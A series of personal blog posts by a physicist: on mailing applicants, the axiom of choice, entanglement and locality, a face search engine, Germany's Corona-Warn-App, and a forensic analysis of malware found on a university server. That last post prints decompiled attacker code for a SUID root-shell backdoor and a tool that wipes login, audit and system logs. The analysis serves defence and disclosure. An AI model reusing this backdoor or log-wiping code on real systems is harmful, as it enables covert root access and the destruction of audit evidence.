Over the last months of the pandemic, I already had to realise, mailing lists are harder and harder to use. As far as I can tell, nobody offers decent mailing lists on the net (at least without too much cost and with reasonable data protection ambitions), probably because those would immediately be used by spammers. So you have to run your own. For the families of our kid's classes at school and for daycare, to spread information that could no longer be posted on physical notice boards, I tried to set up lists on mailman like we used to do it on one of my hosted servers. Oh, what a pain. There are so many hoops you have to jump through so the messages actually end up in people's inboxes. For some major email providers (I am looking at you hosteurope) there is little chance unless the message's sender is in the recipient's address book for example. And yes, I have set up my server correctly, with reverse DNS etc working.

But now, it's application season again. We have received over 250 applications for the TMP master program and now I have to inform applicants about their results. The boundary conditions is that I want to send an individual mail to everybody that contains their name and I want to digitally sign it so applicants know it is authentic and not sent by some prankster impersonating me (that had happened in the past, seriously). And I don't want to send those manually.

So I have a perl script (did I mention I am old), that reads the applicants' data from a database, composes the message with the appropriate template, applies a GPG signature and sends it off to the next SMTP server.

In the past, I had already learned that inside the university network, you have to sleep 10 seconds after each message as every computer that sends emails at a higher rate is considered taken over by some spammers and automatically disconnected from the network for 30 minutes.

This year, I am sending from the home office and as it turns out, some of my messages never make it to the recipients. There is of course no error message to me (thanks spammers) but the message seems to be silently dropped. It's not in the inbox and also cannot be found in the spam folder. Just gone.

I will send paper letters as well (those are required for legal reasons anyway) with a similar script and thanks to TeX being text based on the input side. But is this really the answer for 2021? How am I supposed to inform people I have not (yet) met from around the world in a reliable way?

I am lost.

On Choice

2021-06-25T11:26:00.002+02:00

This is a follow-up to a Twitter discussion with John Baez that did not fit into the 260 character limit. And before starting, I should warn you that I have never studied set theory in any seriousness and everything I am about to write here is only based on hearsay and is probably wrong.

I am currently teaching "Mathematical Statistical Physics" once more, large part of which is to explain the operator algebraic approach to quantum statistical physics, KMS states and all that. Part of this is that I cover states as continuous linear functionals on the observables (positive and normalised) and in the example of B(H), the bounded linear operators on a Hilbert space H, I mention that trace class operators $$\rho\in {\cal S}^1({\cal H})$$ give rise to those via $$\omega(a) = {\hbox tr}(\rho a).$$

And "pretty much all" states arise in this way meaning that the bounded operators are the (topological) dual to trance class operators but, for infinite dimensional H, not the other way around as the bi-dual is larger. There are bounded linear functionals on B(H) that don't come from trace class operators. But (without too much effort), I have never seen one of those extra states being "presented". I have very low standards here for "presented" meaning that I suspect you need to invoke the axiom of choice to produce them (and this is also what John said) and for class this would be sufficient. We invoke choice in other places as well, like (via Hahn-Banach) every C*-algebra having faithful representations (or realising it as a closed Subalgebra of some huge B(H)).

So much for background. I wanted to tell you about my attitude towards choice. When I was a student, I never had any doubt about it. Sure, every vector space has a basis, there are sets that are not Lebesque measurable. A little abstract, but who cares. It was a blog post by Terrence Tao that made me reconsider that (turns out, I cannot find that post anymore, bummer). It goes like this: On one of these islands, there is this prison where it is announced to the prisoners that the following morning, they are all placed in a row and everybody is given a hat that is either black or white. No prisoner can see his own hat but all of those in front of him. They can guess their color (and all other prisoners hear the guess). Those who guess right get free while those who guess wrong get executed. How many can go free?

Think about it.

The answer is: All but one half. The last one says white if he sees an even number of white hats in front of him. Then all the others can deduce their color from this parity plus the answers of the other prisoners behind them. So all but the last prisoner get out and the last has a 50% chance.

But that was too easy. Now, this is a really big prison and there are countably infinitely many prisoners. How many go free? When they are placed in a row, the row extends to infinity only in one direction and they are looking in this infinite direction. The last prisoner sees all the other prisoners.

Think about it.

In this case, the answer is: Almost all, all but finitely many. Out of all infinite sequences of black/white form equivalence classes where two sequences are equivalent if they differ at at most finitely many places, you could say they are asymptotically equal. Out of these equivalence classes, the axiom of choice allows us to pick one representative of each. The prisoners memorise these representatives (there are only aleph1 many, they have big brains). The next morning in the court of the prison, all prisoners can see almost all other prisoners, so they know which equivalence class of sequences was chosen by the prison's director. Now, every prisoner announces the color of the memorised representative at his position and by construction, only finitely many are wrong.

This argument as raised some doubts in me if I really want choice to be true. I came to terms with it and would describe my position as agnostic. I mainly try to avoid it and better not rely too much on constructions that invoke it. And for my physics applications this is usually fine.

But it can also be useful in everyday's life: My favourite example of it is in the context of distributions. Those are, as you know, continuous linear functionals on test functions. The topology on the test functions, however, is a bit inconvenient, as you have to check all (infinitely many) partial derivates to converge. So you might try to do the opposite thing: Let's study a linear functional on test functions that is not continuous. Turns out, those are harder to get hold of than you might think: You might think this is like linear operators where continuity is equivalent to boundedness. But this case is different: You need to invoke choice to find one. But this is good, since this implies that every concrete linear functional that you can construct (write down explicitly) is automatically continuous, you don't have to prove anything!

This type of argument is a little dangerous: You really need more than "the usual way to get one is to invoke choice". You really need that it is equivalent to choice. And choice says that for every collection of sets, the Cartesian product is non-empty. It is the "every" that is important. The collection that consists of copies of the set {apple} trivially has an element in the Cartesian product, it is (apple, apple, apple, ...). And this element is concrete, I just constructed it for you.

This caveat is a bit reminiscent of a false argument that you can read far too often: You show that some class of problems is NP-complete (recent incarnations: deciding if an isolated string theory vacuum as a small cosmological constant, deciding if a spin-chain model is gapped, determining the phase structure of some spin chain model, ...) and then arguing that these problems are "hard to solve". But this does not imply that a concrete problem in this class is difficult. It is only that solving all problems in this class of problems is difficult. Every single instance of practical relevance could be easy (for example because you had additional information that trivialises the problem). It could well be that you are only interested in spin chain Hamiltonians of some specific form and that you can find a proof that all of them are gapped (or not gapped for that matter). It only means that your original class of problems was too big, it contained too many problems that don't have relevance in your case. This could for example well be for the string theory vacua: In the paper I have in mind, that was modelled (of course actually fixing all moduli and computing the value of the potential in all vacua cannot be done with today's technology) by saying there are N moduli fields and each can have at least two values with different values of its potential (positive or negative) and we assume you simply have to add all those values. Is there one choice of the values of all moduli fields such that the sum of the energies is epsilon-close to 0? This turns out to be equivalent to the knapsack-problem which is known to be NP-complete. But for this you need to allow for all possible values of the potential for the individual moduli. If, for example, you knew the values for all moduli are the same, that particular incarnation of the problem is trivial. So just knowing that the concrete problem you are interested in is a member of a class of problems that is NP-complete does not make that concrete problem hard by itself.

What is you attitude towards choice? When is the argument "Here is a concrete, constructed example of a thing x. I am interested in some property P of it. To show there are y that don't have property P, I need to invoke choice. Does this prove x has property P?" to be believed?

Locality Confusion or: What Entanglement Can and Cannot Do For You

2020-07-10T11:04:00.002+02:00

I really enjoyed last week's Zoom edition of the annual Strings conference. Clifford has said many of the things about it that I support wholeheartedly, so I don't have to repeat them here. One of the things I really liked was the active participation in the chat channel that accompanied the talks.

But some of the things I read there gave me the impression that there is some confusion out there about locality and things that can happen in quantum theories that showed up in discussions related to black hole information loss (or the lack thereof). So I though, maybe it's a good idea to sort these out.

Let's start with some basic quantum information: Entanglement is strange, it allows you to do things that maybe at first you did not expect. You can already see this in the easy, finite dimensional situation. Assume our Hilbert space is a tensor product
\[H=H_h\otimes H_t\]
of stuff here and stuff there. Further, for simplicity, assume both factors have dimension d and we can pick a basis
\[(e_\alpha)_{1\le \alpha\le d}\]

for both. If we have a maximally entangled state like
\[\Omega = \frac 1{\sqrt d} \sum_\alpha e_\alpha\otimes e_\alpha\]
the first observation is that instead of acting with an operator A here, you can as well act with the transposed (with respect to our basis) operator there, as you can see when writing out what it means in component:
\[(A\otimes id)\Omega = (id\otimes A^T)\Omega = \frac 1{\sqrt d}\sum_{\alpha\beta} a_{\alpha\beta} e_\beta\otimes e_\alpha.\]
That is, with the entangled state, everything, I can do here creates a state that can also be gotten by doing stuff there. And the converse is true as well: Take any state $\psi \in H$. Then I can find an operator $A$ that acts only here that creates this state from the entangled state:
\[ \psi = (A\otimes id)\Omega.\]
How can we find $A$? First use Schmidt decomposition to write
\[\psi = \sum_j c_j f_j\otimes\tilde f_j\]
where the $c$'s are non-negative numbers and both the $f$'s and the $\tilde f$'s are an ortho-normal basis. Define $V$ to be the unitary matrix that does the change of basis from the $e$'s to the $f$'s. Then
\[ A = \sqrt{d\rho_h}V\]
where we used the density matrix $\rho_h$ that is obtained from $\psi$ as a partial trace over the Hilbert space there (i.e. the state that we see here):
\[\rho_h = tr_{H_t}|\Omega\rangle\langle \Omega| = \sum_j c_j |f_j\rangle\langle f_j|.\]
It's a simple calculation that shows that this $A$ does the job.

In other words, you can create any state of the combined here-there system from an entangled state just by acting locally here.

But what is important is that as still operators here and there commute
\[ [A\otimes id, id\otimes B] =0 \]
you cannot influence measurements there by acting here. If you only measure there you cannot tell if the global state is still $\Omega$ or if I decided to act here with a non-trivial unitary operator (which would be the time evolution for my local Hamiltonian $A$).

It is easy to see, that you don't really need a maximally entangled state $\Omega$ to start with, you just need enough entanglement such that $\rho_h$ is invertible (i..e that there are no 0 coefficients in the Schmidt decomposition of the state you start with).

And from this we can leave the finite dimensional realm and go to QFT, where you have the Reeh-Schlieder theorem which tells you essentially that the quantum vacuum of a QFT has this entanglement property: In that setting, here corrensponds to any local neighbourhood (some causal diamond for example) while there is everything space-like localised from here (for a nice introduction see Witten's lecture notes on quantum information).

But still, this does not mean that by acting locally here in your room you can suddenly make some particle appear on the moon that somebody there could measure (or not). QFT is still local, operators with space-like separation cannot influence each other. The observer on the moon cannot tell if the particle observed there is just a vacuum fluctuation or if you created it in your armchair even though RS holds and you can create state with a particle on the moon. If you don't believe it, go back to the finite dimensional explicit example above. RS is really the same thing pimped to infinite dimensions.

And there is another thing that complicates these matters (and which I learned only recently): Localization in gauge theories is more complicated that you might think at first: Take QED. Thanks to Gauß' law, you can write an expression for the total charge $Q$ as an integral over the field-strength over a sphere at infinity. This seems to suggest that $Q$ has to commute with every operator localised in a finite region as $Q$ is localised in a region space-like to your finite reason. But what if that localised operator is a field operator, for example the electron field $\psi(x)$? Does this mean $Q, \psi(x)]=0$? Of course not, since the electron is charge, it should have
\[ [Q,\psi(x)] = e \psi(x).\]
But does that mean that an observer at spatial infinity can know if I apply $\psi(x)$ right here right now? That would be acausal, I could use this to send messages faster than light.

How is this paradox resolved? You have to be careful about the gauge freedom. You can either say that a gauge fixing term you add in the process of quantisation destroys Gauß' law. Alternatively, you can see that acting with a naked $\psi(x)$ destroys the gauge you have chosen. You can repair this but the consequence is that the "dressed" operator is no longer localised at $x$ but in fact is smeared all over the place (as you have to repair the gauge everywhere). More details can be found in Wojciech Dybalski's lecture notes in the very end (who explained this solution to me).

The same holds true for arguments where you say that the total (ADM) mass/energy in a space time can be measured at spatial infinity.

So the upshot is: Even though quantum theory is weird, you still have to be careful with locality and causality and when arguing about what you can do here and what that means for the rest of the universe. This also holds true when you try to resolve the black hole information loss paradox. Did I say islands?

PimEyes knows what you did last summer

2020-07-10T09:16:00.002+02:00

You might have come across news about a search engine for faces: https://pimeyes.com/en/ . You can upload your photo and it will tell you where in the interwebs it has seen you before. Of course, I had to try it. Here are my results:

OK, that was to be expected. This is the image I use whenever somebody asks me for a short bio with a picture or which I often use as avatar. This is also the first hit when you search for my name on Google Images. This is fine with me, this image is probably my pubic persona when it comes to the information super-highway. But still, if you meet me on the street, you can use PimEyes to figure out who I am. But that was to be expected. Then there come some variants of this picture and an older one that I used for similar purposes.

Next come pictures like these:

There seems to be an Armenian politician with some vague resemblance and the internet has a lot of pictures from him. Fine. I can hide behind him (pretty much like my wife whose name is so common in Germany that the mother of one of our daughter's classmates has the same when you only consider first and maiden name as well as a former federal minister).

But then there is this:

And yes, that's me. This is some open air concert one or two years ago. And it's not even full frontal like the sample I uploaded. And there probably 50 other people who are as much recognisable as myself in that picture. And even though this search engine seems not to know about them right now, there must be hundreds of pictures of similar Ali Mitgutsch Wimmelbuch quality that show at which mass activities I participated. I have to admit, I am a little bit scared.

Installiert die Corona-Warn-App auch wenn keiner sagt, dass sie sicher ist --- oder ein Lehrstück in Öffentlichkeitskommunikation

2020-06-16T12:39:00.001+02:00

Seit heute gibt es sie, die Corona-Warn-App, und ihr könnt (und solltet, siehe unten) sie herunterladen und installieren.

Das ist die kurze Nachricht. Sie hätte auch in einen Tweet gepasst. Warum noch ein Blogpost? Das liegt daran, dass viele Bedenken gegen diese App kursieren und andererseits niemand (insbesondere nicht der CCC) sagt "Alles Quatsch, die App ist sicher!". Diese Situation würde ich gerne etwas erklären.

Das fängt mit einem Mantra an, dass seit Jahren hergebetet wird: "Sicherheit (im Sinn von Security) ist kein Zustand, sondern ein Prozess". Jede Software, deren Komplexität wesentlich über

10 PRINT "HALLO"

20 GOTO 10

hinaus geht, wird Bugs haben. Ich zitiere gerne eine alte IBM Studie, die besagt, dass es praktisch nicht gelingt, weniger als 1 Bug pro etwa 10.000 Zeilen Code zu haben, weil man, wenn man den Code weiter versucht zu debuggen und testen, dabei mehr Fehler einbaut als man eliminiert. Selbst der NASA, die sich da sehr viel Mühe gibt, fallen regelmässig Raumsonden wegen Softwarefehlern hart auf Planetenoberflächen. Und das sicher nicht, weil die leichtfertig waren.

Daher kann es nur darum gehen, möglichst wenig Fehler zu produzieren (mit entsprechenden Tests, Audits, Software-Werkzeugen, die einem helfen etc). Aber niemand, der weiss, was er tut, wird garantieren können, dass man alles gefunden hat. Man kann nur dokumentieren, dass man sich Mühe gegeben hat und dabei nach best practices gehandelt hat. Und vor allem: Wenn dann doch ein Fehler auftaucht, muss man die entsprechende Fehlerkultur haben und ihn schnell und effektiv beseitigen. Besser geht's leider nicht. Die Alternative ist nur, keine Computer bzw keine Software zu benutzen.

Und weil Leute, die wissen, wovon sie reden, genau diesen Umstand kennen, lassen sie sich nicht dazu verleiten "Die App habe ich geprüft, sie ist sicher" öffentlich zu sagen.

Was man aber sehr wohl feststellen kann, ist wenn etwas unsicher ist und man eine Lücke gefunden hat. Und das wird ja auch regelmäßig gemacht und auch der CCC hält sich nicht zurück, über Probleme öffentlich zu reden, wenn man sie denn gefunden hat (responsible disclosure beachtend), wie zB in der jüngsten Vergangenheit beim Telematix-Netzwerk im Gesundheitswesen.

Was man sehr wohl hören sollte, ist dass man genau sowas über die Corona-Warn-App zumindest bisher nicht hört. Es gibt sehr wohl die 10 Prüfsteine für eine solche App und am Anfang sah es nicht so aus, als würden sie eingehalten (zB zentrale Serverstruktur, closed source), aber an dieser Stelle beschwert sich momentan niemand. Vielmehr gibt es viel Lob, dass auf Kritik reagiert wurde: Es werden die Kontaktdaten nur lokal auf den Telefonen gespeichert (auch schon weil Apple und Google dies als sinnvoll eingesehen haben und es nicht wirklich eine App gegen die entsprechenden Betriebsystemhersteller gegeben hätte, schon alleine weil die die Betriebssysteme es aus Securitygründen Apps nicht einfach erlauben, dauerhaft und im Hintergrund Bluetooth zu verwenden) und der Source-Code zusammen mit der Entwicklungsgeschichte wurde öffentlich auf GitHub zur öffentlichen Überprüfung zugänglich gemacht. Und die Öffentlichkeit hat tatsächlich Probleme gefunden. Aber diese wurden nicht ignoriert, sondern behoben.

Und genau das ist der Prozess, von dem ich oben sprach. Den darf man auch gerne mal loben und sagen "so soll's sein, gerne wieder". Und das wird ja auch getan. Man muss dem eben nur zuhören und verstehen (was leider nicht so richtig kommuniziert wird), dass dieses Lob eigentlich die bessere Variante des "Zertifikat: die App ist sicher" ist. Hier ist leider das Schweigen nicht laut genug, das "nicht geschimpft ist genug gelobt" ist leider nicht sehr öffentlichkeitswirksam, bzw bedarf einer Erklärung, wie ich sie hier versuche. Update: Linus Neumann, CCC Sprecher, macht es doch.

"Aber es gibt doch Kritikpunkte" höre ich Euch sagen. Ja, die gibt es. Aber schauen wir sie uns an, ob die von ihnen ausgehende Gefahr den möglichen Nutzen der App übersteigen kann:

"Man kann Leute tracken" Ja, kann man. Aber nur, wenn man die Republik flächendeckend mit Bluetooth-Empfängern überzieht. Pavel Meyer hat dieses Argument ausführlicher gemacht.
"Ich muss Bluetooth anschalten, das hatte schon Lücken in der Vergangenheit." Stimmt. Gilt aber auch für Wifi/Internet. Wenn man sich darum sorgt, empfehle ich das Handy abzuschaffen. Update: Bei Android-Smartphones, die nicht gegen bekannte Probleme gepatched werden können (Android Update nach 1. Februar 2020), ist es vielleicht doch keine gute Idee, Bluetooth einzuschalten. Kann man aber drüber nachdenken, ob das ein Problem der App oder des Smartphones ist.
"Die App ist open source, aber was ist mit der Library von Apple/Google?". Stimmt auch. Gilt aber auch für das Betriebssystem des Handys. Wenn Apple/Google euch überwachen wollen und eure Daten raustragen wollen, können sie das nicht erst seit der App. Sondern seit ihr ein Handy benutzt. Also wieder besser: Handy in den Shredder.
"Wenn nicht viele die App benutzen, nützt sie nichts" (oder auch in der Version "die App ist nicht verpflichtend, so kann sie nicht funktionieren, also benutze ich sie nicht"). Ja. Henne und Ei. Dann benutz sie doch. Ist wieder ein Beispiel des Gefangenendilemmas, kann man ändern indem man selber kooperiert und hofft, dass die anderen zum gleichen Schluss kommen.

Bleibt noch eine Meta-Frage: Ich möchte eigentlich diese ganze Geschichte auch als eine Erfolgsgeschichte des CCC abbuchen, man hat (nehmen wir mal an, es hat tatsächlich einen Einfluss gehabt) echte Verbesserungen erreichen können. Vor allem wenn man sich vor Augen führt, was am Anfang der Geschichte vorgeschlagen wurde, wie GPS-tracking, eine zentrale, staatliche Kontaktdatenbank etc. Der Umstand, dass hier auf die Expertise gehört wird, ist auch ein langfristiger Erfolg, es wurde verstanden, sich über die Jahre als kompetenter und kritischer Beobachter zu etablieren. Die Öffentlichkeit wurde für entsprechende Themen hellhörig gemacht.

Andererseits lese ich auf social media viel Kritik an der App und Erklärungen, warum sie böse ist oder warum man sie sich selber auf keinen Fall installieren will. Die halbwegs rationalen Einwände habe ich eben aufgezählt (auch wenn meine Kosten-Nutzen-Abwegung klar anders ist und ich first thing this morning mir die App installiert habe), es gibt aber auch unendlich viel, was sich im Spektrum Halbwissen bis Aluhuttum bewegt. Es werden viele Bedenken geäussert, die aber eher aus dem Bauch kommen (der Staat will uns Stasi-mässig überwachen) aber aus technischer Sicht nach allem, was man weiss, nicht haltbar sind. Und irgendwie fürchte ich, dass viele von diesen Leuten auch von CCC und Co in ihrer kritischen Sicht mitsozialisiert worden sind und irgendwann falsch abgebogen sind.

Und das ist dann schon ein Wermutstropfen bzw eine Aufgabe für die Zukunft: Wie schafft man es, vor allem auch in seiner Kommunikation, noch deutlicher die begründeten von den unbegründeten Bedenken (die aber so ähnlich klingen) zu trennen? Wie kann man hier offensiver seine Sicht kommunizieren ohne in ein "Wir versprechen Euch, ist alles sicher" verfallen zu müssen? Dieser Text ist jedenfalls ein Versuch in diese Richtung.

Und noch der nötige Disclaimer: Ich bin zwar Mitglied beim CCC (sowohl in München als auch schweigendes im Bundes-CCC). Ich spreche aber nicht für den Club. Dies ist nur meine Meinung (die aber aus meiner Sicht natürlich jedeR teilen sollte, auch alle Clubs der Welt. Haha)

High Performance Hackers

2020-05-16T13:23:00.001+02:00

In the last few days, there was news that several big academic high performance computing centers had been hacked. Here in Munich, LRZ, the Leibniz Rechenzentrum was affected but apparently also computers at the LMU faculty of physics (there are a few clusters in the institute's basement). You could hear that it were Linux systems that were compromised and the attackers left files in /etc/fonts.

I could not resist and also looked for these files and indeed found those on one of the servers:

helling@hostname:~$ cd /etc/fonts/
helling@hostname:/etc/fonts$ ls -la
total 52
drwxr-xr-x   4 root root  4096 Apr  5  2018 .
drwxr-xr-x 140 root root 12288 May 14 10:07 ..
drwxr-xr-x   2 root root  4096 Aug 29  2019 conf.avail
drwxr-xr-x   2 root root  4096 Aug 29  2019 conf.d
-rwsr-sr-x   1 root root  6256 Apr  5  2018 .fonts
-rw-r--r--   1 root root  2582 Apr  5  2018 fonts.conf
-rwxr-xr-x   1 root root 15136 Apr  5  2018 .low

Uhoh, a dot-file with SUID root?!? I had an evening to spare so I could finally find out if I can use some of the forensic tools, that are around. As everybody know, the most important one is "strings". But neither strings .fonts nor strings .low revealed anything interesting about those programs. So we need some heavier lifting. I chose ghidra (thanks NSA for that) as my decompiler.

Let's look at .fonts (the suid one) first. It consists of one central function that I called runbash. Here is what I got after some renaming of symbols:

void runbash(void)

{
  char arguments [4];
  char command [9];
  int i;
  
  command[0] = 'N';
  command[1] = '\0';
  command[2] = '\n';
  command[3] = '\n';
  command[4] = 'J';
  command[5] = '\x04';
  command[6] = '\x06';
  command[7] = '\x1b';
  command[8] = '\x01';
  i = 0;
  while (i < 9) {
    command[i] = command[i] ^ (char)i + 0x61U;
    i = i + 1;
  }
  arguments[0] = '\x03';
  arguments[1] = '\x03';
  arguments[2] = '\x10';
  arguments[3] = '\f';
  i = 0;
  while (i < 4) {
    arguments[i] = arguments[i] ^ (char)i + 0x61U;
    i = i + 1;
  }
  setgid(0);
  setuid(0);
  execl(command,arguments,0);
  return;
}

There are two strings, command and arguments and first there is some xoring with a loop variable going on. I ran that as a separate C program and what it produces is that command ends up as "/bin/bash" and arguments as "bash". So, all this program does is it starts a root shell. And indeed it does (i tried it on the server, of course it has been removed since then).

The second program, .low, is a bit longer. It has a main function that mainly deals with command line options depending on which it calls one of three functions that I termed machmitfile(), machshitmitfile() and writezerosinfile() which all take a file name as argument and modify those files by removing lines or overwriting stuff with zeros or doing some other rewriting that I did not analyse in detail:

/* WARNING: Could not reconcile some variable overlaps */

ulong main(int argc, char ** argv)

{
  char * __s1;
  char * pcVar1;
  bool opbh;
  bool optw;
  bool optb;
  bool optl;
  bool optm;
  bool opts;
  bool opta;
  int numberarg;
  char uitistgleich[40];
  passwd * password;
  char * local_68;
  char opt;
  uint local_18;
  uint retval;
  char * filename;

  scramble( &UTMP, 0xd);
  scramble( &WTMP, 0xd);
  scramble( &BTMP, 0xd);
  scramble( &LASTLOG, 0x10);
  scramble( &MESSAGES, 0x11);
  scramble( &SECURE, 0xf);
  scramble( &WARN, 0xd);
  scramble( &DEBUG, 0xe);
  scramble( &AUDIT0, 0x18);
  scramble( &AUDIT1, 0x1a);
  scramble( &AUDIT2, 0x1a);
  scramble( &AUTHLOG, 0x11);
  scramble( &HISTORY, 0x1b);
  scramble( &AUTHPRIV, 0x11);
  scramble( &DEAMONLOG, 0x13);
  scramble( &SYSLOG, 0xf);
  scramble( &ACHTdPROZENTs, 7);
  scramble( &OPTOPTS, 0xb);
  scramble( &UIDISPROZD, 7);
  scramble( &ERRORARGSEXIT, 0x11);
  scramble( &ROOT, 4);
  filename = (char * ) 0x0;
  local_18 = 0;
  opbh = false;
  optw = false;
  optb = false;
  optl = false;
  optm = false;
  opts = false;
  opta = false;
  now = time((time_t * ) 0x0);
  while (_opt = getopt(argc, argv, & OPTOPTS), _opt != -1) {
    switch (_opt) {
    case 0x61:
      opta = true;
      break;
    case 0x62:
      optb = true;
      break;
    default:
      printmessage();
      /* WARNING: Subroutine does not return */
      exit(1);
    case 0x66:
      filename = optarg;
      break;
    case 0x68:
      opbh = true;
      break;
    case 0x6c:
      optl = true;
      break;
    case 0x6d:
      optm = true;
      break;
    case 0x73:
      opts = true;
      break;
    case 0x74:
      local_18 = 1;
      numberarg = atoi(optarg);
      if (numberarg != 0) {
        numberarg = atoi(optarg);
        now = (time_t) numberarg;
        if ((0 < now) && (now < 0x834)) {
          now = settime();
        }
      }
      break;
    case 0x77:
      optw = true;
    }
  }
  if (((((!opbh) && (!optw)) && (!optb)) && ((!optl && (!optm)))) && ((!opts && (!opta)))) {
    printmessage();
  }
  if (opbh) {
    if (argc <= optind + 1) {
      printmessage();
      /* WARNING: Subroutine does not return */
      exit(1);
    }
    if (filename == (char * ) 0x0) {
      filename = & UTMP;
    }
    retval = machmitfile(filename, argv[optind], argv[(long) optind + 1], (ulong) local_18);
  } else {
    if (optw) {
      if (argc <= optind + 1) {
        printmessage();
        /* WARNING: Subroutine does not return */
        exit(1);
      }
      if (filename == (char * ) 0x0) {
        filename = & WTMP;
      }
      retval = machmitfile(filename, argv[optind], argv[(long) optind + 1], (ulong) local_18);
    } else {
      if (optb) {
        if (argc <= optind + 1) {
          printmessage();
          /* WARNING: Subroutine does not return */
          exit(1);
        }
        if (filename == (char * ) 0x0) {
          filename = & BTMP;
        }
        retval = machmitfile(filename, argv[optind], argv[(long) optind + 1], (ulong) local_18);
      } else {
        if (optl) {
          if (argc <= optind) {
            printmessage();
            /* WARNING: Subroutine does not return */
            exit(1);
          }
          if (filename == (char * ) 0x0) {
            filename = & LASTLOG;
          }
          retval = writezerosinfile(filename, argv[optind], argv[optind]);
        } else {
          if (optm) {
            if (argc <= optind + 3) {
              printmessage();
              /* WARNING: Subroutine does not return */
              exit(1);
            }
            if (filename == (char * ) 0x0) {
              filename = & LASTLOG;
            }
            retval = FUN_00401bb0(filename, argv[optind], argv[(long) optind + 1],
              argv[(long) optind + 2], argv[(long) optind + 3]);
          } else {
            if (opts) {
              if (argc <= optind) {
                printmessage();
                /* WARNING: Subroutine does not return */
                exit(1);
              }
              local_68 = argv[optind];
              if (filename == (char * ) 0x0) {
                printmessage();
              } else {
                retval = machshitmitfile(filename, local_68, (ulong) local_18, local_68);
              }
            } else {
              if (opta) {
                if (argc <= optind + 1) {
                  printmessage();
                  /* WARNING: Subroutine does not return */
                  exit(1);
                }
                __s1 = argv[optind];
                pcVar1 = argv[(long) optind + 1];
                numberarg = strcmp(__s1, & ROOT);
                if (numberarg == 0) {
                  local_18 = 1;
                }
                machmitfile( & WTMP, __s1, pcVar1, (ulong) local_18);
                machmitfile( & UTMP, __s1, pcVar1, (ulong) local_18);
                machmitfile( & BTMP, __s1, pcVar1, (ulong) local_18);
                writezerosinfile( & LASTLOG, __s1, __s1);
                machshitmitfile( & MESSAGES, __s1, (ulong) local_18, __s1);
                machshitmitfile( & MESSAGES, pcVar1, (ulong) local_18, pcVar1);
                machshitmitfile( & SECURE, __s1, (ulong) local_18, __s1);
                machshitmitfile( & SECURE, pcVar1, (ulong) local_18, pcVar1);
                machshitmitfile( & AUTHPRIV, __s1, (ulong) local_18, __s1);
                machshitmitfile( & AUTHPRIV, pcVar1, (ulong) local_18, pcVar1);
                machshitmitfile( & DEAMONLOG, __s1, (ulong) local_18, __s1);
                machshitmitfile( & DEAMONLOG, pcVar1, (ulong) local_18, pcVar1);
                machshitmitfile( & SYSLOG, __s1, (ulong) local_18, __s1);
                machshitmitfile( & SYSLOG, pcVar1, (ulong) local_18, pcVar1);
                machshitmitfile( & WARN, __s1, (ulong) local_18, __s1);
                machshitmitfile( & WARN, pcVar1, (ulong) local_18, pcVar1);
                machshitmitfile( & DEBUG, __s1, (ulong) local_18, __s1);
                machshitmitfile( & DEBUG, pcVar1, (ulong) local_18, pcVar1);
                machshitmitfile( & AUDIT0, __s1, (ulong) local_18, __s1);
                machshitmitfile( & AUDIT0, pcVar1, (ulong) local_18, pcVar1);
                machshitmitfile( & AUDIT1, __s1, (ulong) local_18, __s1);
                machshitmitfile( & AUDIT1, pcVar1, (ulong) local_18, pcVar1);
                machshitmitfile( & AUDIT2, __s1, (ulong) local_18, __s1);
                machshitmitfile( & AUDIT2, pcVar1, (ulong) local_18, pcVar1);
                machshitmitfile( & AUTHLOG, __s1, (ulong) local_18, __s1);
                machshitmitfile( & AUTHLOG, pcVar1, (ulong) local_18, pcVar1);
                machshitmitfile( & HISTORY, __s1, (ulong) local_18, __s1);
                retval = machshitmitfile( & HISTORY, pcVar1, (ulong) local_18, pcVar1);
                password = getpwnam(__s1);
                if (password != (passwd * ) 0x0) {
                  sprintf(uitistgleich, & UIDISPROZD, (ulong) password - > pw_uid);
                  machshitmitfile( & SECURE, uitistgleich, (ulong) local_18, uitistgleich);
                  machshitmitfile( & AUDIT0, uitistgleich, (ulong) local_18, uitistgleich);
                  machshitmitfile( & AUDIT1, uitistgleich, (ulong) local_18, uitistgleich);
                  retval = machshitmitfile( & AUDIT2, uitistgleich, (ulong) local_18, uitistgleich);
                }
              }
            }
          }
        }
      }
    }
  }
  return (ulong) retval;
}

But what are the file names? They sit in some memory locations pre-initialized at startup but remember, strings did not show anything interesting.
But before anything else, a function scramble() is called on them:

void scramble(char *p,int count)

{
  int m;
  int i;
  
  if (0 < count) {
    m = count * 0x8249;
    i = 0;
    while (m = (m + 0x39ef) % 0x52c7, i < count) {
      p[i] = (byte)m ^ p[i];
      m = m * 0x8249;
      i = i + 1;
    }
  }
  return;
}

As you can see, once more there is some xor-ing going on to hide the ascii filename. So, once more, I put the initial data as well as this function a in a separate C program and it produced:

603130: /var/run/utmp
60313e: /var/log/wtmp
60314c: /var/log/btmp
603160: /var/log/lastlog
603180: /var/log/messages
6031a0: /var/log/secure
6031b0: /var/log/warn
6031be: /var/log/debug
6031d0: /var/log/audit/audit.log
6031f0: /var/log/audit/audit.log.1
603210: /var/log/audit/audit.log.2
603230: /var/log/auth.log
603250: /var/log/ConsoleKit/history
603270: /var/log/authpriv
603290: /var/log/daemon.log
6032b0: /var/log/syslog

Ah, these are the log-files where you want to remove your traces.

This is how far my analysis goes. In case, you want to look at this yourself, I put everything (both binaries, the Ghidra file, my separate C program) in a tar-ball for you to download.

What all this does not show: How did the attackers get in in the first place (possibly by stealing some user's private keys on another compromised machine), how they did the privilege escalation to be able to produce a suid-root file and also, for how long they have been around. As you can see above, the files have a time stamp from over two years ago. But once you are root you can of course set this to whatever you want. But it's not clear why you wanted to back date your backdoor. I should stress that I am only a normal user on that server, so for example I don't have access to the backups to check if these files have really been around for that long.

Furthermore, the things I found are not very sophisticated. Yes, they prevented my to find out what's going on with strings by obfuscating their strings. But the rest was all so straight forward that even amateur like myself with a bit of decompiling could figure our what is going on. Plus leaving your backdoor as a suid program laying around in the file system in plain sight is not very secretive (but possibly enough to be undetected for more than two years). So unless these two files are not explicitly there to be found, the attacker will not be the most subtle one.

Which leaves the question about the attacker's motivation. Was it only for sports (bringing some thousand CPUs under control)? Was it for bitcoin mining (the most direct way to turn this advantage into material gain)? Or did they try to steal data/files etc?

If you have an account on one of the affected machines (in our case that would be anybody with a physics account at LMU as at least one affected machine had your home directory mounted) you should revoke all your secret keys that were stored there (GPG or ssh, in the latter case that means in particular delete them from .ssh/authorizedkeys and .ssh/authorizedkeys2 everywhere, not just on the affected machines. And you should consider all data on those machines compromised (whatever that might have as consequences for you). If attackers had access to your ssh private keys, they could be as well on all machines that those allow to log into without entering further passwords/passphrases/OTPs.

